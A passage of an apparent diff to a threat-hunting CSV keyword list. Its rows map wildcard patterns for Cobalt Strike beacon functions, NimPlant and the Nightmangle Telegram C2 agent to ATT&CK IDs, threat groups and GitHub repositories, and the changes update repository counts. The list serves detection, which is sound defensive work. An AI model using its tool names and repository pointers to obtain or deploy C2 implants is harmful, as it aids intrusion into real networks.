- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*BEACON_RDLL_*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exec_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" 
@@ -7693,20 +7839,20 @@ "*beacon_top_callback*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*BeaconApi.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*beacon-c2-go*","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","36","8","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" -"*BeaconCleanupProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconCleanupProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*BeaconConsoleWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt 
Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*BeaconGetSpawnTo*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*beacongrapher.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*BeaconInjectProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" -"*BeaconInjectProcess*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconInjectProcess*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*BeaconInjectProcess*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 
- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*BeaconInjectTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
